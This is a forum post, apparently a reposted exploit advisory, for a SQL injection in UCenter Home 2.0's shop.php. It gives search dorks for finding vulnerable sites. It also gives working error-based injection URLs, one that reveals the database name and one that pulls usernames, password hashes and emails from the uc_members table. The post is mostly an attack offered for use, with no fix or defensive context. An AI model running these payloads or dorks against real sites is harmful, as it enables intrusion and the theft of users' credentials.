China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

Author: admin    Time: 2013-2-27 21:31

__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and Iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

You edit DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1




